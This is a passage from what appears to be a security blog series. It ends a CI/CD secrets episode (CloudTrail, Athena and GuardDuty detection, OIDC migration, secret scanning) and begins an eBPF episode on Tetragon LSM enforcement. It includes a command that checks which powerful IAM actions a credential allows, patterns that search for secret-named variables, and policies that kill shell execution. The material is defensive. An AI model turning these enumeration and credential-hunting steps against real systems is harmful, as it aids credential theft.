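  --action-names "s3:ListAllMyBuckets" "ec2:DescribeInstances" "iam:CreateAccessKey" "iam:PassRole" "sts:AssumeRole" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text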

Blue Phase: Detection Across the Secret Lifecycle

GitHub Secret Scanning Alerts

# List secret scanning alerts in a repository via GitHub API
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open" | \
  jq '.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }'

CloudTrail: Detecting API Activity from CI/CD Credentials

When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:

# Find API calls made with a CI/CD credential from unexpected source IPs
# (for example, an attacker using the stolen key). Requires GNU date.
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,Name:EventName,Raw:CloudTrailEvent}' \
  --output json | \
  jq '.[] | {
    time: .Time,
    event: .Name,
    ip: (.Raw | fromjson | .sourceIPAddress),
    user_agent: (.Raw | fromjson | .userAgent)
  } | select(.ip | test("^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)") | not)'
  # Filter: keeps events whose source IP is outside RFC1918 space. Replace the
  # regex with your CI/CD platform's known egress ranges so legitimate runs drop out.
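To see exactly what the RFC1918 filter keeps, here is a sketch of the same regex as a bash function (`classify_source_ip` is a hypothetical name). It treats anything outside 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16 as external; that is an assumption built into the filter, not a statement about which addresses are safe:

```bash
#!/usr/bin/env bash
# Sketch: the RFC1918 test from the jq filter, as a bash function.
# Assumption carried over from that filter: anything outside 10.0.0.0/8,
# 172.16.0.0/12 and 192.168.0.0/16 counts as "external".
classify_source_ip() {
  local ip="$1"
  # Keep the regex in a variable so bash does not reinterpret the backslashes.
  local re='^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)'
  if [[ "$ip" =~ $re ]]; then
    echo "rfc1918"
  else
    echo "external"
  fi
}

classify_source_ip 172.20.1.5        # rfc1918
classify_source_ip 172.32.1.5        # external (outside 172.16.0.0/12)
classify_source_ip s3.amazonaws.com  # external: service names fall through too
```

CloudTrail also writes AWS service hostnames such as s3.amazonaws.com into sourceIPAddress, so those count as external here. GitHub-hosted runners call AWS from public addresses, so for them the useful version of this check compares against the runners' egress ranges instead of RFC1918.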

SIEM Query: Credential Used in Multiple Regions Simultaneously

A credential used from more than two regions within the same hour is a strong signal of compromise, though a pipeline that legitimately deploys to several regions will trip it too:

-- Athena query against CloudTrail logs
-- Detect: same access key used from more than two regions in the same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = 'IAMUser'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC('hour', from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) > 2
ORDER BY region_count DESC;
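The GROUP BY / HAVING logic can be tried offline before it runs against real logs. A sketch, assuming the CloudTrail fields have already been flattened to one "accessKeyId hour region" line per event (that input format and the `keys_in_many_regions` name are made up for illustration); it counts distinct regions per key per hour and prints the buckets above the threshold, mirroring `COUNT(DISTINCT awsRegion) > 2`:

```bash
#!/usr/bin/env bash
# Sketch of the Athena query's GROUP BY key, hour / HAVING COUNT(DISTINCT region) > 2,
# applied to pre-flattened "accessKeyId hour region" lines on stdin
# (an input format assumed for this illustration).
keys_in_many_regions() {
  local threshold="${1:-2}"
  awk -v t="$threshold" '
    # Count each (key, hour, region) triple once, so repeated calls do not inflate.
    !seen[$1 SUBSEP $2 SUBSEP $3]++ { regions[$1 SUBSEP $2]++ }
    END {
      for (k in regions) {
        if (regions[k] > t) {
          split(k, parts, SUBSEP)
          print parts[1], parts[2], regions[k]
        }
      }
    }'
}

printf '%s\n' \
  "AKIAEXAMPLE1 2024-05-01T10 us-east-1" \
  "AKIAEXAMPLE1 2024-05-01T10 eu-west-1" \
  "AKIAEXAMPLE1 2024-05-01T10 ap-south-1" \
  "AKIAEXAMPLE2 2024-05-01T10 us-east-1" \
  "AKIAEXAMPLE2 2024-05-01T10 us-west-2" | keys_in_many_regions
# prints: AKIAEXAMPLE1 2024-05-01T10 3
```

Passing a different threshold (for example `keys_in_many_regions 1`) is a cheap way to see how many of your normal keys a tighter rule would flag.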

GuardDuty: Credential Exfiltration Indicators

# GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/TorIPCaller",
          "UnauthorizedAccess:IAMUser/MaliciousIPCaller",
          "Discovery:IAMUser/AnomalousBehavior",
          "Exfiltration:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -r -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}'

Purple Phase: The Structural Fix

Fix 1: OIDC Workload Identity — Eliminate Stored Credentials

This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS checks the token against the IAM OIDC identity provider and the role's trust policy, then issues temporary credentials that expire on their own (one hour by default in this setup, adjustable with the action's role-duration-seconds input).

The OIDC workload identity approach eliminates static cloud access keys entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.

GitHub Actions with AWS OIDC — complete setup:

# .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/

AWS IAM trust policy for GitHub Actions OIDC:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        },
        "StringLike": {
          "token.actions.githubusercontent.com:sub": "repo:your-org/your-repo:ref:refs/heads/main"
        }
      }
    }
  ]
}

# Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "6938fd4d98bab03faadb97b34396831e3780aea1"

# Create the IAM role with the trust policy above (saved as github-actions-trust-policy.json)
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy

Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS

Pre-commit hooks don't stop a determined attacker. They catch accidents: the developer who forgets to add a .env file to .gitignore before staging everything.

# Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat > .pre-commit-config.yaml << 'EOF'
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: ['--maxkb=1000']
EOF

# Install the hooks in the local repository
pre-commit install

# Run every hook once across all files in the repository (the gitleaks hook above still checks only staged changes)
pre-commit run --all-files

Fix 3: CI-Layer Secret Scanning — Block Before Merge

# GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        # @main is a mutable ref; pin a commit SHA for production use
        uses: trufflesecurity/trufflehog@main
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json

# GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: "true"  # Scan full history

Fix 4: Audit and Rotate Existing CI/CD Platform Secrets

After implementing OIDC, the migration path for existing stored credentials:

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo "=== AWS IAM Keys Potentially Stored in CI/CD ==="
echo "--- Active access keys with creation and last-used details ---"

# Get all IAM users, then each user's active access keys
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read -r user; do
    keys=$(aws iam list-access-keys --user-name "$user" \
      --query 'AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}' \
      --output json)

    if [ "$(echo "$keys" | jq length)" -gt 0 ]; then
      echo ""
      echo "User: $user"
      echo "$keys" | jq -r '.[] | "  Key: " + .Key + " | Created: " + .Created'

      # Check last used
      echo "$keys" | jq -r '.[].Key' | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id "$key_id" \
          --query 'AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}' \
          --output json)
        echo "  Last used: $(echo "$last_used" | jq -r '.Date // "Never"') | Service: $(echo "$last_used" | jq -r '.Service // "N/A"')"
      done
    fi
  done

echo ""
echo "=== MIGRATION CHECKLIST ==="
echo "  1. For each CI/CD IAM key above:"
echo "     a. Identify which CI/CD platform uses it"
echo "     b. Set up OIDC trust policy for that platform"
echo "     c. Update pipeline to use OIDC (no stored key)"
echo "     d. Disable and then delete the IAM key"
echo "     e. Verify pipelines still work"
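The audit prints each key's CreateDate but leaves judging its age to you. A sketch for turning that date into an age in days, assuming GNU date and the ISO 8601 timestamps the AWS CLI emits; the 90-day cut-off and the function names are illustrative choices, not AWS defaults:

```bash
#!/usr/bin/env bash
# Sketch: age of an access key in whole days, from the CreateDate the audit
# prints (e.g. 2023-01-15T10:00:00+00:00). Requires GNU date for -d parsing.
key_age_days() {
  local created="$1"
  local now="${2:-$(date -u +%Y-%m-%dT%H:%M:%SZ)}"   # optional "now", handy for testing
  echo $(( ( $(date -u -d "$now" +%s) - $(date -u -d "$created" +%s) ) / 86400 ))
}

# Illustrative policy: flag keys older than 90 days (not an AWS default).
flag_if_old() {
  local age
  age=$(key_age_days "$1" "$2")
  if (( age > 90 )); then
    echo "ROTATE ($age days)"
  else
    echo "ok ($age days)"
  fi
}

flag_if_old 2023-01-15T10:00:00+00:00 2024-01-15T10:00:00+00:00   # ROTATE (365 days)
```

Called with only the CreateDate, `flag_if_old` measures against the current time.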

Run This in Your Own Environment: Secrets Exposure Audit

#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo "=== 1. Scan Local Repository for Committed Secrets ==="
if command -v trufflehog > /dev/null 2>&1; then
  results=$(trufflehog git "file://$(pwd)" --only-verified --json 2>/dev/null | \
    jq -c '{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}')
  if [ -n "$results" ]; then
    echo "$results"
  else
    echo "  No verified secrets found in git history"
  fi
else
  echo "  Install trufflehog (brew install trufflehog, or use the Docker image)"
fi

echo ""
echo "=== 2. Check for .env Files in Git History ==="
git log --all --full-history -- "*.env" "**/.env" ".env.*" 2>/dev/null | \
  grep "^commit" | head -5 | \
  while read _ commit; do
    echo "  .env file committed: $commit"
    git show "$commit" --stat | head -3
  done

echo ""
echo "=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ==="
if command -v kubectl > /dev/null 2>&1; then
  kubectl get pods -A -o json 2>/dev/null | \
    jq -r '.items[] | 
      .metadata.namespace + "/" + .metadata.name + ": " + 
      ([.spec.containers[].env[]? | 
        select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL"; "i")) |
        .name
      ] | join(", "))' | \
    grep -v ": $" | head -20
else
  echo "  kubectl not found"
fi

echo ""
echo "=== 4. GitHub Actions Secrets Inventory ==="
if [ -n "${GITHUB_TOKEN}" ]; then
  REPO="your-org/your-repo"  # Update this
  curl -s -H "Authorization: Bearer ${GITHUB_TOKEN}" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/repos/${REPO}/actions/secrets" | \
    jq '.secrets[] | {name: .name, updated: .updated_at}'
else
  echo "  Set GITHUB_TOKEN to enumerate repository secrets"
fi

⚠ Common Mistakes When Addressing CI/CD Secrets Exposure

Treating secret scanning as the primary control. TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.

Rotating compromised keys without checking CloudTrail for use. When a secret is exposed, the first question is not “rotate it” — it is “was it used?” Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.

Using OIDC trust policies that are too broad. The GitHub Actions OIDC trust policy in the fix section uses a StringLike condition on the sub claim to scope to a specific repository and branch. If you use StringLike: "*" instead, any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.
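A quick way to see how loose a sub pattern is: bash's `[[ == ]]` glob matching behaves much like StringLike for the two wildcards IAM supports, `*` and `?`. A sketch under that assumption (`sub_matches` is a hypothetical helper; bash additionally treats `[...]` as a character class, which IAM does not):

```bash
#!/usr/bin/env bash
# Sketch: approximate IAM StringLike matching of the OIDC "sub" claim with
# bash glob matching. Assumes the pattern uses only * and ? (the wildcards
# StringLike supports); bash would also honour [...] classes, IAM does not.
sub_matches() {
  local sub="$1" pattern="$2"
  # Leaving $pattern unquoted on the right of == makes bash treat it as a glob.
  if [[ "$sub" == $pattern ]]; then
    echo "allowed"
  else
    echo "denied"
  fi
}

scoped='repo:your-org/your-repo:ref:refs/heads/main'
sub_matches 'repo:your-org/your-repo:ref:refs/heads/main' "$scoped"            # allowed
sub_matches 'repo:your-org/your-repo:pull_request'        "$scoped"            # denied
sub_matches 'repo:someone-else/fork:ref:refs/heads/main'  '*'                  # allowed: any repo
sub_matches 'repo:your-org/other-repo:ref:refs/heads/dev' 'repo:your-org/*'    # allowed: whole org
```

Test your real pattern against the sub values your jobs actually produce. Jobs that use a GitHub environment present a sub of the form repo:ORG/REPO:environment:NAME rather than the branch ref, so a branch-scoped pattern will not match them.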

Not scanning git history, only the working tree. Secrets that were committed and then deleted are still in git history: git rm removes the file from the working tree and the index, but every earlier commit still contains it. TruffleHog's git mode and gitleaks detect both walk commit history rather than just the current files; pass --log-opts="--all" to Gitleaks to cover every branch and ref. Scanning only the current working tree misses all historical exposures.

Forgetting third-party GitHub Actions. The supply chain attack surface includes the Actions you reference in your workflows. An Action referenced by a mutable ref, a branch such as @main or a tag such as @v4, can be repointed by the maintainer or by anyone who compromises the maintainer's account. Pin to a specific commit SHA and verify the Action's provenance.

# Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4
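To find references that still need pinning, a rough line-based sketch (it greps rather than parsing YAML, and `unpinned_actions` is a hypothetical name) that lists every `uses:` value not ending in a 40-character commit SHA, skipping local `./` actions:

```bash
#!/usr/bin/env bash
# Sketch: list "uses:" references not pinned to a full 40-character commit SHA.
# Line-based grep over workflow YAML on stdin, not a YAML parser.
unpinned_actions() {
  grep -oE 'uses:[[:space:]]*[^[:space:]#]+' \
    | sed -E 's/^uses:[[:space:]]*//' \
    | grep -vE '@[0-9a-f]{40}$' \
    | grep -v '^\./' || true   # local actions (./path) have no ref to pin
}

printf '%s\n' \
  '- uses: actions/checkout@v4' \
  '- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4' \
  '- uses: trufflesecurity/trufflehog@main' \
  '- uses: ./.github/actions/build' | unpinned_actions
# prints actions/checkout@v4 and trufflesecurity/trufflehog@main
```

Run it per file, for example `unpinned_actions < .github/workflows/deploy.yml`. Docker references (docker://...) are reported too, since a tag there is just as mutable.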

Quick Reference

Secret storage pattern                  Risk level       Structural fix
.env file committed to public repo      Critical         Pre-commit hook + OIDC
.env file committed to private repo     High             Git history purge + pre-commit hook + OIDC
Long-lived key in CI/CD env var         High             OIDC workload identity
Long-lived key in K8s Secret            High             Pod identity / IRSA / Workload Identity
Secret in build log output              Medium           Mask secrets in CI configuration
Secret in container env var             Medium           Vault agent / CSI secrets driver
Key referenced via AWS Secrets Manager  Low (if scoped)  Use for remaining static secrets

Key Takeaways

  • CI/CD secrets exposure is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys
  • Automated secret scanners find publicly committed credentials within 60–90 seconds — rotation must happen faster than that or assume compromise
  • Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself
  • OIDC workload identity is the structural fix: no stored credential means no credential to exfiltrate
  • When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident
  • OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form
  • Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface

What’s Next

EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you’ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.

Get EP07 in your inbox when it publishes → subscribe at linuxcent.com

LSM and Tetragon — When the Kernel Says No

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 12


Architecture Overview

LSM BPF and Tetragon kernel security enforcement architecture (diagram): LSM BPF hooks fire before sensitive operations complete, and Tetragon uses them to enforce and kill, not just observe.

TL;DR

  • LSM enforcement with Tetragon connects Linux Security Module hooks to eBPF programs: the check runs inside the kernel before the operation completes, so there is no detect-and-respond window
    (LSM hook = Linux Security Module hook: a callback point built into the kernel that fires before a security-relevant operation completes, allowing the security module to approve or reject it)
  • Falco and similar detection-only tools alert after the fact: the syscall returns, the file is written, the connection is established, and only then does the alert fire; with LSM, the syscall never returns success
  • BPF_PROG_TYPE_LSM is the eBPF program type that attaches to LSM hooks, introduced in kernel 5.7 and stable in 5.10+; current Ubuntu LTS, Fedora, and EKS/GKE kernels build it in, but bpf is not always in the active LSM list by default, so check /sys/kernel/security/lsm
  • Tetragon attaches eBPF programs to LSM hooks and kprobes simultaneously — observing and enforcing from the same kernel attachment point
  • Tetragon’s enforcement sends SIGKILL from within the kernel context — not from a userspace agent reading an audit log and then killing the process
  • Production caution: LSM enforce mode without thorough policy testing in audit mode first will kill legitimate workloads; always audit before enforce

EP11 showed how to observe DNS queries at the kernel level, seeing what a workload resolves before it establishes a connection. But observation is passive. It tells you what happened. LSM enforcement with Tetragon changes the question entirely: instead of watching the workload, the kernel refuses the operation. This episode covers how that enforcement layer works and why the difference between “detect” and “prevent” matters in runtime security.

Quick Check: Is Your Cluster Running LSM-Based Enforcement?

# On any cluster node — what security modules are active?
cat /sys/kernel/security/lsm

# Example output from a node with BPF LSM enabled:
# lockdown,capability,landlock,yama,apparmor,bpf
#                                              ^^^
#                            "bpf" here means BPF LSM is enabled

# Is Tetragon running on this cluster?
kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon

# If Tetragon is present, check which TracingPolicies are loaded
# (TracingPolicy is cluster-scoped, so there is no NAMESPACE column):
kubectl get tracingpolicies

# Sample output:
# NAME                      AGE
# block-privileged-exec     3d
# restrict-sensitive-paths  3d

# See what eBPF programs Tetragon has loaded
bpftool prog list | grep -i tetragon

# Output sample:
# 89: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 3312B  jited 2184B  memlock 8192B
# 91: kprobe  name tetragon_kp_exec tag 3c1d8e2f7a4b5c9d  gpl

lsm program type confirms LSM hook attachment. If you see tetragon_lsm_* entries, Tetragon is enforcing at the kernel level on this node.

Not running Tetragon? Check whether your cluster applies seccomp or AppArmor profiles instead: kubectl get pod <name> -o jsonpath='{.spec.securityContext}{.spec.containers[*].securityContext}' and look for seccompProfile or appArmorProfile fields (older clusters used the seccomp.security.alpha.kubernetes.io and container.apparmor.security.beta.kubernetes.io annotations). These profiles are loaded from userspace and enforced by the kernel. Tetragon is additive: it can run alongside AppArmor and seccomp, and it provides per-process, dynamic policy that static profiles cannot.


Falco fired at 03:14 AM. The alert: a process inside a production container had opened /etc/passwd for writing. By the time I was on the call, the container had been restarted by a health check failure — the compromised process had already exited. The file had already been modified. Falco had detected the open, emitted the alert, and by the time any automated response could have acted, the syscall had returned, the write had completed, and the file was changed.

Falco did exactly what it's designed to do: observe and alert. The gap isn't in Falco; it's in the architecture. When a tool detects from userspace by consuming syscall events the kernel has already processed, there is always a window between the operation completing and the alert firing. For a fast exploit, that window is the entire attack.

I added a Tetragon TracingPolicy the following week:

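apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: protect-passwd-shadow   # illustrative name
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      return: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchArgs:
            - index: 0
              operator: "Prefix"
              values: ["/etc/passwd", "/etc/shadow"]
          # No access-mask condition here, so reads match as well as writes
          matchActions:
            - action: Sigkill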

Now, when a process in a container covered by that policy hits that hook for /etc/passwd, the kernel sends SIGKILL from within the hook, and the process dies before the call returns to userspace, so it never gets to write. There is no userspace response window.
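The Prefix operator is plain string-prefix matching. A sketch of those semantics in bash (`prefix_selector_matches` is hypothetical, and it models only the string comparison, not how Tetragon turns the kernel argument into a path) shows a side effect worth knowing before enforcing: /etc/passwd as a prefix also matches /etc/passwd-, the backup copy the shadow tools maintain:

```bash
#!/usr/bin/env bash
# Sketch: string-prefix semantics of the selector above
# (operator "Prefix", values /etc/passwd and /etc/shadow).
# Models only the string comparison, not how Tetragon derives the path.
prefix_selector_matches() {
  local path="$1"; shift
  local prefix
  for prefix in "$@"; do
    # "$prefix" quoted = literal text; the trailing * allows anything after it.
    if [[ "$path" == "$prefix"* ]]; then
      echo "match"
      return
    fi
  done
  echo "no-match"
}

prefix_selector_matches /etc/passwd-  /etc/passwd /etc/shadow   # match (backup file)
prefix_selector_matches /etc/group    /etc/passwd /etc/shadow   # no-match
```

Where only the exact files should match, an exact-comparison operator such as Equal is the narrower choice.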


How LSM Hooks Are Placed in the Kernel

Linux Security Modules (LSM) is a framework built into the Linux kernel that inserts hook points before security-sensitive operations. The hook fires before the operation is allowed to complete — the LSM module can return an error code that causes the kernel to reject the operation and return -EPERM to the calling process.

Process calls open("/etc/passwd", O_WRONLY)
      ↓
VFS (Virtual Filesystem) layer receives the request
      ↓
VFS calls security_inode_permission()   ← LSM hook fires here
      ↓
LSM module checks policy
      ↓
      ├── ALLOW → open() proceeds, file descriptor returned
      └── DENY  → open() returns -EPERM, process gets "Permission denied"
                  File is never touched

LSM hook: a callback point embedded in Linux kernel source at security-sensitive operations such as file open, execute, socket connect, capability check, mount, ptrace, and more. The kernel calls every registered LSM module at each hook. Before BPF LSM (kernel 5.7), only security modules compiled into the kernel, such as SELinux, AppArmor, Smack and TOMOYO, could register at these hooks; BPF LSM lets eBPF programs attach to them at runtime.

BPF_PROG_TYPE_LSM: the eBPF program type that attaches to LSM hooks. Introduced in kernel 5.7. Requires a kernel built with CONFIG_BPF_LSM=y and bpf present in the active LSM list, set either by CONFIG_LSM at build time or by the lsm= boot parameter (append bpf to the existing list rather than replacing it). When this program type is loaded and attached to an LSM hook, the eBPF program runs at the hook point and returns 0 (allow) or a negative error code (deny).

The full list of LSM hooks:

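# LSM hook stubs available for eBPF attachment appear in the kernel's BTF
# as bpf_lsm_<hook> functions (requires a kernel with BTF, CONFIG_DEBUG_INFO_BTF)
bpftool btf dump file /sys/kernel/btf/vmlinux | grep -o "'bpf_lsm_[a-z0-9_]*'" | head -20

# Or browse the kernel source:
# include/linux/lsm_hook_defs.h lists every hook; the security_*() wrappers
# declared in include/linux/security.h call into them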

There are 200+ LSM hook points. The most operationally relevant for container security:

LSM hook                      What it guards
security_bprm_check           Process execution (execve)
security_inode_permission     File read/write/execute
security_inode_create         File creation
security_socket_connect       Outbound TCP/UDP connect
security_socket_bind          Port binding
security_ptrace_access_check  ptrace (debugger attach)
security_capable              Capability checks (CAP_SYS_ADMIN etc.)

How Tetragon Combines LSM and kprobe

Tetragon attaches two types of programs simultaneously for comprehensive runtime security:

kprobe programs          LSM programs
(observation layer)      (enforcement layer)
       │                        │
       ↓                        ↓
Process executes              Kernel LSM hook fires
kernel function               BEFORE operation completes
       │                        │
       ↓                        ↓
Tetragon reads context:       Tetragon checks TracingPolicy:
  - process name                - selectors match?
  - PID, UID                    - action = Sigkill?
  - namespace, pod name         │
  - parent process              ↓
  - capabilities                SIGKILL sent from kernel context
       │                        Process terminated
       ↓                        Operation never completes
Tetragon exports event
  to userspace observer

The kprobe side provides the rich context (pod name, namespace, process tree) because it has access to Kubernetes metadata that Tetragon’s userspace component has pre-populated into maps. The LSM side provides the enforcement capability. Together, they give you context-aware kernel enforcement.

SIGKILL from kernel vs userspace kill: when a userspace process runs kill -9 <pid>, it issues a kill syscall, the kernel queues the signal, and the target dies the next time it is scheduled and handles pending signals. Until then the target can keep running, including finishing whatever it was in the middle of. A BPF LSM program that returns a negative error code refuses the operation inside the hook itself. A hook program that calls bpf_send_signal(SIGKILL) queues the signal for the current task from within the kernel's execution context, so the process is killed before it returns to userspace and never acts on the result of the syscall. This is not just a speed difference: it changes when enforcement happens relative to the operation.


Writing a Tetragon TracingPolicy for Enforcement

Tetragon policies are Kubernetes custom resources. Here’s a policy that prevents any container from executing shells:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: block-shell-exec
spec:
  kprobes:
    - call: "security_bprm_check"
      syscall: false
      args:
        - index: 0
          type: "linux_binprm"
      selectors:
        - matchBinaries:
            - operator: "In"
              values:
                - "/bin/sh"
                - "/bin/bash"
                - "/bin/dash"
                - "/usr/bin/sh"
                - "/usr/bin/bash"
          matchNamespaces:
            - namespace: Pid
              operator: "NotIn"
              values: ["host_ns"]  # host PID namespace; other values are namespace inode numbers, not PIDs
          matchActions:
            - action: Sigkill    # kill the calling process; argError applies only to the Override action
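matchBinaries with operator In is an exact comparison against the listed paths. A sketch of that semantics (`binary_selected` and the SHELLS array are illustrative, mirroring the values above) makes the gap visible: a shell started from any path not on the list, such as /usr/bin/dash or /bin/busybox, is not selected:

```bash
#!/usr/bin/env bash
# Sketch: exact-match ("In") semantics of the matchBinaries list above.
SHELLS=(/bin/sh /bin/bash /bin/dash /usr/bin/sh /usr/bin/bash)

binary_selected() {
  local bin="$1" listed
  for listed in "${SHELLS[@]}"; do
    if [[ "$bin" == "$listed" ]]; then
      echo "selected"
      return
    fi
  done
  echo "not-selected"
}

binary_selected /bin/bash      # selected
binary_selected /usr/bin/dash  # not-selected: not on the list
binary_selected /bin/busybox   # not-selected
```

Confirm in Post mode which binary paths actually show up in events before relying on the list.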

Apply and verify:

kubectl apply -f block-shell-exec.yaml

# Confirm it's active
kubectl get tracingpolicies
# NAME               ENABLED   REASON   AGE
# block-shell-exec   true               5s

# Verify Tetragon loaded the eBPF program for this policy
bpftool prog list | grep bprm
# 94: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T14:22:13+0530  uid 0

Test it (in a non-production namespace):

kubectl exec -it test-pod -- /bin/sh

# Expected output:
# OCI runtime exec failed: exec failed: unable to start container process:
# error during container init: error starting executable ["/bin/sh"]:
# container_linux.go: ... starting container process caused: process_linux.go:
# ... SIGKILL

The shell never ran. The security_bprm_check hook fired, the Tetragon eBPF program matched the policy and sent SIGKILL from kernel space, and the process that was about to become the shell was killed before the new binary could execute. The container runtime reports the exec as failed.


Audit Mode Before Enforce Mode

Running a new LSM policy in enforce mode without prior testing will kill legitimate workloads. Tetragon supports audit mode for every policy:

          matchActions:
            - action: Post     # audit mode: log event, do NOT kill

Post emits a Tetragon event that you can observe:

# Watch audit events for the policy (before switching to Sigkill)
# Each Tetragon pod only sees events from its own node
